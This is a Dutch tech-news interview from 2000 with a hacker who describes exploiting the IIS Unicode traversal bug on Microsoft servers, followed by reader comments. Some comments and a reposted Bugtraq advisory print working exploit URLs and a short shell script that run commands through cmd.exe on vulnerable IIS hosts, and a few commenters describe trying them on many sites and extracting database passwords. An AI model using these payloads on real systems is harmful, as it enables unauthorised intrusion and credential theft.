Interview met Microsoft-hacker Dimitri

Microsoft hack aankondiging Vandaag heeft Tweakers.net voor jullie een exclusief interview met Dimitri, degene die vrijdag in het nieuws was wegens het hacken van Microsoft. We zochten via e-mail contact met hem en stelden een aantal vragen. Overigens is dit niet zomaar iemand die zich voordoet als hacker. Na een klein onderzoekje was ik erachter dat er bij zijn e-mailadres echt de naam Dimitri hoort zoals in het nieuws over de hack genoemd werd. Ook heb ik van zijn buren vernomen dat ze hem haast nooit zien. Een typische hacker dus.

Lees verder voor de vragen, met de daarbij behorende antwoorden. Overigens zijn het niet letterlijk zijn woorden maar vertalingen van mij ervan in goed Nederlands :

Geef eens een korte omschrijving van jezelf. Wat voor persoon schuilt er achter de naam Dimitri?

Mijn naam is dus Dimitri en in woon in Delft. Ik zit vaak op het internet om de nieuwste manieren te leren of te creëren om op computersystemen in te breken.

Hoe mijn omgeving reageert op mijn ‘computercriminaliteit’, zoals ze het zo mooi noemen? Mijn vrienden vinden het niet zo erg. Ze vinden het naar mijn weten juist wel apart en grappig. Zelf vind ik ook niet dat hacken strafbaar zou moeten zijn, zolang je het maar wel beperkt houdt. Richt je echter schade aan, is het niet netjes meer. Daar ben ik tegen. Dat is in ieder geval niet mijn doel.

Overigens zien mijn buren me haast nooit omdat altijd thuis zit, werk of in de Baja Beach Club (discotheek) zit. Ik ben dus ook maar een gewone jongen, in tegenstelling tot het beeld dat veel mensen van 'computernerds' hebben.

Hoe ga je te werk als je een computer wilt hacken?

Ik werk meestal in stapjes. Als je bijvoorbeeld een Internet Information Server wilt hacken, kan dat op veel verschillende manieren. Belangrijk is goed te weten hoe je met DOS omgaat.

Ik ben trouwens niet zo'n hacker die de hele dag websites zit te kraken ofzo. Wel heb ik meegeholpen aan een perfecte advisory bij SecurityFocus voor de unicode bug. Daarom weet ik alles van dat onderwerp en ben ik op zoek gegaan naar servers die nog niet goed beveiligd waren.

Maar als je dan een toch inbreekt in een computer, zoals vrijdag bij Microsoft, ben je dan niet bang gepakt te worden?

Nee, hoor. Ik meld mijn bezigheden altijd aan het betreffende bedrijf. Hier zijn de beveiligingsmensen van het bedrijf alleen maar blij mee.

De brandende vraag is dan natuurlijk: hoe zat het nou precies met de hack van afgelopen vrijdag?

Deze keer heb ik gekeken op verschillende servers van Microsoft of de Unicode bug aanwezig was. En ja hoor. Op heel veel servers was (en is) de beveiliging slecht. Hierdoor had ik toegang tot een groot aantal zaken, zoals de downloadfiles en usernames.

Na even op de servers rondgekeken te hebben stuurde ik een e-mail naar Microsoft. Het bedrijf reageerde echter niet. Toen stuurde ik de usernames die ik al direct via l0phtcrack te pakken had gekregen, plus nog een aantal andere zaken zoals mijn wetenschap van Houston (het serverdomein) en dat soort dingen. Maar ze reageerden nog steeds niet. Dit waarschijnlijk, omdat vast al veel meer mensen toegang hadden gekregen via de security-fout.

Vlak voor deze hack was Microsoft al eerder in het nieuws geweest met beveiligingsproblemen. Had jij daar ook wat mee te maken?

Toen de hack waarbij voor Microsoft's source codes gevreest werd bekend werd gemaakt schrok ik eerst wel. Net daarvoor had ik namelijk een mailtje gestuurd naar Microsoft dat de boel slecht beveiligd was. Maar gelukkig ging dit toch over iemand anders.

Ik verwacht wel dat mijn hack door deze hack in het nieuws kwam. Doordat Microsoft al op deze negatieve manier in het nieuws kwam werden ook andere (iets lichtere) hacks aan het licht gebracht.

Heb je plannen voor de toekomst, of is het allemaal nog erg vaag?

Ik zou het nog niet weten. Ik kan je wel vertellen dat ik altijd bezig ben in de security wereld. Ik kom regelmatig voor in security postings en advisory's, maar echte plannen maak ik nooit van tevoren.

Nog een laatste opmerking voor de Tweakers.net bezoekers?

Geen stoute dingen doen

Deze wijze raad lijkt me een mooi slot voor dit interview.

Dimitri wil om privacy-redenen liever niet zijn e-mailadres gepubliceerd hebben. Voor vragen aan hem kan je daarom mij als tussenpersoon gebruiken.

Reacties (75)

Marger
6 november 2000 10:19

Nog een laatste opmerking voor de Tweaker.net bezoekers?

Hee, hebben we een nieuwe domeinnaam?

Niet dat ik nou graag wil gaan hacken, maar ik vraag me toch af wat hij bedoelt met:

Belangrijk is goed te weten hoe je met DOS omgaat.

Iemand die weet wat DOS met hacken te maken heeft?

looskuh
@Marger • 6 november 2000 10:21

ja dat vond ik ook al een vreemde, je hoort nooit iets anders dat je toch echt linux oid moet hebben om serieus iets te doen, maar nee, good' ol' DOS blijkt het ook te kunnen!
Nou ik kan er goed mee omgaan, "bring it on" zou ik zeggen!

humi
@looskuh • 6 november 2000 13:00

met DOS in het kader van hacken worden gewoon ms-dos/nt console commando's bedoelt. Een DoS (Denial of Service) is eigenlijk niet meer een bug die gebruikt kan worden om een server zo zwaar in de knoei te laten komen dat ie niet meer reageerd. Om te hacken heb je inderdaad kennis nodig van commando's en bugs. Een denial of service attack is meer iets waar de hackers zich niet mee bezig houden, maar word eigenlijk toegeschreven aan crackers (ik geloof dat ik het zo goed zeg). Die leggen inderdaad een site lam, en brengen schade toe. Een hacker probeert ergens in te komen, maar zal nooit als doel hebben schade te berokkenen aan dat bedrijf.

Scorpion
@humi • 6 november 2000 13:17

Inderdaad, waarom zou een hacker een site willen platleggen wanneer deze ook de optie heeft om het systeem binnen te dringen, en zo te laten zien dat deze site idd open ligt voor de buitenwereld.

Wanneer dimitri DoS bedoelde ipv de DOS-Commando's (command.com), dan had hij ook nooit de password files kunnen ophalen, omdat de site simpelweg niet berijkt kon worden.

cyrax
@looskuh • 6 november 2000 10:26

Zou Dimitri niet:

DOS = Denial Of Service

Bedoelen ? Dit lijkt me logischer

Marger
@cyrax • 6 november 2000 10:28

Dat denk ik niet, hoe wil jij een server hacken die plat ligt door een DoS-attack? Die geeft dan namelijk geen antwoord

Auteur+2

Anoniem: 3689
@cyrax • 6 november 2000 13:08

Na navraag bij Dimitri blijkt het inderdaad over DOS (Disk Operating System) te gaan.

Anoniem: 14918
@cyrax • 6 november 2000 11:39

Naar mijn mening wordt met DoS idd Denial of Service bedoeld. Maar, met DoS kun je in plaats van een systeem ook een bepaalde service platleggen. En juist dit biedt dan weer mogelijkheden... de rest mag je dan zelf verzinnen, maar bedenk: geen stoute dingen doen *grin*

iNSaNe-oNe

@Anoniem: 14918 • 6 november 2000 11:47

Als je bijvoorbeeld een Internet Information Server wilt hacken, kan dat op veel verschillende manieren. Belangrijk is goed te weten hoe je met DOS omgaat.

Ik denk dat hij echt hier bedoelt dat je met een CLI (Command-Line Interface) moet kunnen omgaan. Scriptkiddies die alleen Win9x-ervaring hebben en alleen maar op iconen kunnen rammen zullen het waarschijnlijk niet ver schoppen... vandaar die opmerking. DoS zal misschien ook wel iets met het platleggen van M$-servers te maken kunnen hebben (ik hoop niet dat ik nu mensen op ideen breng

), maar wordt hier denkik niet bedoeld.

My 2 cents...

GA!S
@cyrax • 7 november 2000 08:44

had meteen ff gevraagd waarom!

Anoniem: 14916
@looskuh • 6 november 2000 10:34

}>hehehe kijk voor de gein ff hier als je meer wil weten...www.10pht.com/

Anoniem: 12390
@Anoniem: 14916 • 19 november 2000 15:08

Hier dus: www.l0pht.com/

looskuh
@Anoniem: 14916 • 6 november 2000 12:14

Hmm, vage site, waar moet ik kijken?

Daan
@looskuh • 6 november 2000 10:35

Hmmm.. DOS.. bedoelt ie niet Denial Of Service attacks?

The Lord
@Marger • 6 november 2000 10:36

Bij bijvoorbeeld die unicode bug kun je doodleuk commando's (DOS) meesturen. Vandaar dat goede kennis van DOS of NT console handig is.

Anoniem: 12248
@Marger • 6 november 2000 18:12

yep, volgens mij zijn er met dos heel veel beveiligingen te omzeilen. Als mij iets in windows met een bepaalde file niet wil lukken dan doe ik het via dos.

Anoniem: 14265
@Marger • 13 december 2000 20:26

ze hebben hem gewijzigd

maar geen typefouten meer maken hè?

NuKeFaCe
@Marger • 19 februari 2001 15:19

ALLES !!!!!!!!!!!
Ken je geen DoS maar wel Windows dan heb je een groot probleem

Tom
6 november 2000 11:04

hmm waarom naar normaal Nederlands omgezet? lijkt me wel stoer om gewoon in zijn taaltje te lezen

kun je die niet ff ergens online gooien?

Anoniem: 1886
@Tom • 6 november 2000 11:07

0md4t lee7 h4x0r t44L z0 m03il1jk t3 l3z3n i5

Auteur+2

Anoniem: 3689
@Anoniem: 1886 • 6 november 2000 13:11

Inderdaad. Die Dimitri schrijft ongelofelijk vaag. Qua formuleren en grammatica klopt er weinig van de zinnen. Check dit bijvoorbeeld:

Omdat bijvoorbeeld bij een Internet Information Server hack kan je op verschillende manieren doen

Ik heb een tijd samen met Wouter zitten puzzelen, voordat ik erachter was wat hij nou bedoelde met een aantal antwoorden...

Marger
@Anoniem: 3689 • 6 november 2000 13:35

Namelijk schrijft hij niet ik vind ongelooflijk vaag daarvoor lezen je moet het kunnen gewoon! Als normaal hij en ik voor schrijven, men de rest van de wereld gek

Cookie
@Anoniem: 3689 • 6 november 2000 18:52

Lol.
Van iemand die zo'n hack kan zetten, verwacht je dat-ie ook een zin correct kan formuleren. Is wellicht toch wel meer 'computernerd' dan hij van zichzelf denkt

Anoniem: 14609
@Anoniem: 3689 • 18 november 2000 22:18

nou.. ik ken een andere prof persoonlijk.. en die is beswel dyslecties...
is er connectie tussen dyslecties en hacken ofzo?

mijn ma is zo'n remedial teacher (juf voor kiddos die nie kunne leren, want ze zijn dyslecties)... ff kijken of al die kids die ze helpt ook gaan hacken

Anoniem: 7452
@Anoniem: 3689 • 19 november 2000 20:33

Nou na een goeie compu analize, ben ik tot de conclusie gekomen dat dit de style is van dimitri.

Style van schrijven: Type "Vago/niet nalezen van tekst".

Voorbeeld van deze style:

Dit is een vorm van niet goed lezen wat je zelf geschreven hebt, geschreven is niet goed gelezen is het... niet goed lezen.....

Kortom herhalen wat je al gezegt hebt of zomaar met iets nieuws beginnen midden in een zin snapie?

Nee: Ga lekker e-mailen met dimitri (tip).

Ja: geen commentaar....

Ach wat ben ik weer lekker flauw vandaag... maarjah het is zondag wat moet je anders...

Anoniem: 14322
@Anoniem: 3689 • 20 november 2000 11:23

Ik heb een tijd samen met Wouter zitten puzzelen, voordat ik erachter was wat hij nou bedoelde met een aantal antwoorden...

bij microsoft zijn ze nu nog steeds aan het puzzelen, daarom heeft dimitri ook geen reply gehad.. ;]

Anoniem: 10278
@Anoniem: 3689 • 6 november 2000 23:07

Hej Timmer!
Deed je dat met Wouter Buikstra?

Die is een Expert in vreemde, vage en trendy taal, geloof me....

Wouter Tinus
@Anoniem: 3689 • 7 november 2000 19:38

Nee dat was ik

Anoniem: 5562
6 november 2000 13:05

Ik zie het tegenwoordig ook nogal veel... mensen die alleen weten hoe je op icons moet rammen..
of mensen die met windows omgaan alsof het dos is.

ff een voorbeeldje:

programma's van je computer verwijderen door op de map te klikken op op del te drukken.. waardoor programma's niet goed verwijderd worden (register, dll's blijven staan) en dan vervolgens bij mij aankloppen dat hun computer niet goed meer functioneerd.

Het valt mij op dat een heleboel mensen een computer kopen, omdat ze niet achter willen blijven. Maar de meeste mensen nemen dan niet de moeite om zich in het apparaat te verdiepen.

neem die reclame van Pac|<ard Be|| ... "mensen gebruiken maar 30% van hun hersenen, stelt u zich eens voor als u alles zou gebruiken.
u gebruikt maar 30% van uw computer, stelt u zich eens voor als u alles zou gebruiken."
(zoiest in ieder geval)

volgens mij gebruikt de meerderheid van de mensen hun computer voor nog geen 10 %.

terwijl anderen er toch 80-90% gebruik van maken.

Ik ben van mening dat je niet iets moet kopen, als je je er niet meer dan 60% van datgene wilt leren gebruiken en begrijpen.

CyberSnooP
@Anoniem: 5562 • 6 november 2000 20:14

Je lult maar een end weg

Wat als die 10% (bv. scriptie schrijven) nou juist ontzettend belangrijk is voor de koper?
Stel dat hij zo'n scriptie moet schrijven... maar zich helemaal niet interresseert in het maken van een 3D-Filmpje?

Enfin... eerste denken dan typen

Anoniem: 14700
@CyberSnooP • 7 november 2000 09:11

Jij lult ook maar een eind weg

want je hebt niet in de gaten dat het daar niet om de processor gaat.

P5ycho
@Anoniem: 14700 • 10 november 2000 14:22

Goh heb jij ook de film Hackers gezien

ok negeer dit verder maar

BrZ
@CyberSnooP • 8 november 2000 14:20

Wat hij bedoelt is dat veel mensen een snelle pc kopen (bv nu een GHz pc bij de appie) omdat de buren ofzo ook een snelle pc hebben...

Zet ze achter een P2 400 en ze merken het verschil niet eens.....

Anoniem: 10700
@Anoniem: 5562 • 12 november 2000 12:28

Als Dutch Power Cow gebruik je toch wel 100% van je computer

HJR
@Anoniem: 10700 • 15 november 2000 14:52

Het is toch triest als je je Server op deze manier moet beveiligen dan ben je toch verkeerd bezig. Je moet gewoon een OS hebben wat veel beter met rechten omgaat en dan wordt de kans veel kleiner.

TheGhostInc
@Anoniem: 5562 • 12 november 2000 18:55

Ik wil mijn wasmachine ook niet helemaal kennen, hij moet het gewoon doen.
Een computer is gewoon een gebruiksvoorwerp. Netzoals een tandenborstel

Anoniem: 11992
6 november 2000 10:33

Met DOS (het MS-Dos dus) kun je, mits je genoeg weet volgens mij veeeel meer instellen en doen dan in windows. Bovendien zijn meeste servers unix based of zo.... ook dosachtig

But I'm not shure

Anoniem: 8192
@Anoniem: 11992 • 6 november 2000 18:07

Unix is DOS-achtig
Jaja mm-mm zozo
Of was het toch andersom, zeg maar dat Dos een mislukte kloon is van Unix
Of zo

Anoniem: 10572
@Anoniem: 11992 • 8 november 2000 13:39

erm je bent dus geen microfoon? (shure)

weet je dat heel zeker? (sure)

Anoniem: 14283
6 november 2000 13:36

Voor hen die het weten willen : )))

onderstaande stukje code maakt gebruik van de Folder Traverse fout van IIS...... Anyways, het laatste stukkie toont aan dat je DOS kennis in orde moet zijn : ) (je zou nu nl met een beetje code een assembler exe kunnen bakken en die evt runnen als een trojan)..

[url="http://www.badhost.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\"]www.badhost.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+C:[/url]

victorb
@Anoniem: 14283 • 6 november 2000 16:39

als je je /script alias in je www.root uitzet heb je er geen last van ik weet niet of er patchen voor zijn maar dit helpt.

en tja ik heb dit ook wel geprobeert en heb bijv webservers gevonden waar bijv de .com wel kan maar de .com.tw weer wel beveiligt is.

dus dit is gewoon nalatigheid van de admins. ik heb een mailtje gestuurd maar er is niks aan gedaan

maar tja of dit een hack is ik vindt het meer een scriptkiddie die publiciteit zoekt en zo naams bekentheid wilt.

* 786562 victorb

Burat
@Anoniem: 14283 • 6 november 2000 21:58

Jah, en
www.badhost.com/scripts/..%c0%af../winnt/system32/net.exe?view om te zien welke pc's er in dat netwerk hangen.

Ik heb even een aantal (ehm, ok dan, heel veel) sites geprobeerd, en het is echt VERSCHRIKKELIJK als je ziet hoeveel er open staan..! En dan heb ik het over grote bedrijven..

[ti]
7 november 2000 15:44

Misschien interresant (post van bugtraq):

Hi,
A friend (Dimitri van de Giessen) called me after reading the article
regarding this remote execution UNICODE style bug in the IIS
webserver (supposedly >4.0) found by a anonymous packetstorm mailer
and investigated by RFP.

Again NT??!?

Yes... again...
I called in another friend (Kristian Vlaardingerbroek) to eat a lot and
to help me find out this funny bug.
We started investigating and after a while we found that rain forest
puppy's string "%c1%af" worked on our english version of NT 4.0.
Playing a bit, feeling tired, we found that you CAN get out of the
document_root_drive to execute cmd.exe.

Remember the msadc RDS "feature" ?

Ok, so why not use /msadc ? Its a directory placed on the system drive
and usually accessible through normal HTTP requests.
Knowing this you would know that putting the website on a different
drive than your systemdrive would not make a difference at all ;)_
You can put it on and Q:\> if you like, you're still possibly
vulnerable.
Imagine what you could do with this:

----blaat.sh----
#!/bin/sh
lynx -dump
[url="http://$1/msadc/..\%c0\%af../..\%c0\%af../..\%c0\%af../winnt/system32/cmd.exe\?/c\+$2+$3+$4+$5+$6+$7"]$1/msadc/..\%c0\%af../..\%c0\%af../..\%c0\%af../winnt/system32/cmd.exe\?/c\+$2+$3+$4+$5+$6+$7[/url]

--------------
./blaat.sh www.yourownmachine.com dir c:\\ <- you need the double
backslash to escape it.

And voila, a dir listing.
It seems that every different language version of NT has different
UNICODE chars, didnt find out other countries yet, will be easy to make
in perl as RFP described (not going to give you source code either ;-)).

Most probably sample files like pagevieuw and codebrws.asp, other iis
samples and other "features" like msadc, webhits, newdsn and +.htr
(%2B) get interesting AGAIN when placed on other dirs vieuwable by the
dir c:\\anything command. Get blisters patching your NT.

Now you can execute commands, welcome to amazing wold of Microsoft(TM).

Cheers,
Marco van Berkum, Dimitri van de Giessen, Kristian Vlaardingerbroek.

Marco - www.obit.nl (marco@obit.nl) www.britney.com
Dimitri - www.IS-Watch.nl (info@IS-Watch.nl)
www.is-watch.nl/microsoft.jpg

Kristian - www.obit.nl (kris@obit.nl) www.slashdot.org

Burat
@[ti] • 7 november 2000 18:58

Tsja.. ik weet het intussen.. Het is echt belachelijk, het staat ZO enorm open. Je kan de asp-sources bekijken, daar MSSQL usernames en passwords uithalen, connecten naar de db en alles en nog wat eruit halen.. Je kan ALLES, en ook bij grotere bedrijven, vooral hardware bedrijven overigens..

Anoniem: 10
10 november 2000 13:48

Julius< Op systemen die ik beheer is nog nooit iemand in staat geweest dingen te doen die niet mijn bedoeling waren. En ja, ik beheer er veel (werk)...> Je schreeuwt

Jezus man alles is te hacken!

jubeth
@Anoniem: 10 • 11 november 2000 03:20

Jezus man alles is te hacken!

Sorry, maar dat is niet waar, elke poort die dicht staat en blijft staan, staat ook echt dicht voor elke hacker.

Om mijn vorige bericht "Overbodig" te noemen vind ik, in het licht van de hier besproken hacks, heel erg dom en kortzichtig:
Als men namelijk vooraf gedaan had wat ik daar noem, dan waren al deze MS-hacks onmogelijk geweest. Lees eens wat er technisch gezien nu eigenlijk heeft plaatsgevonden bij deze hacks. Die zouden tot het verleden behoren als de directory-en file-names niet zo eenvoudig te raden waren geweest.

lost95

@jubeth • 13 november 2000 19:00

Regel 1 in beveiliging was toch schep nooit op over je beveiliging?

The Dude
6 november 2000 10:33

En Microsoft maar nog steeds niet reageren. Dan ben als je bedrijf toch echt zwaar stom bezig. Na geen bugvrije OS'en & programma's te kunnen maken kunnen ze niet eens hun spul een beetje beveiligen. Dang wat een triest geval dat Microsoft.
Het is maar goed dat Linux steeds meer games begint te ondersteunen. Kan ik eindelijk van dat vervloekte Microsoft afstappen

Anoniem: 14916
6 november 2000 10:36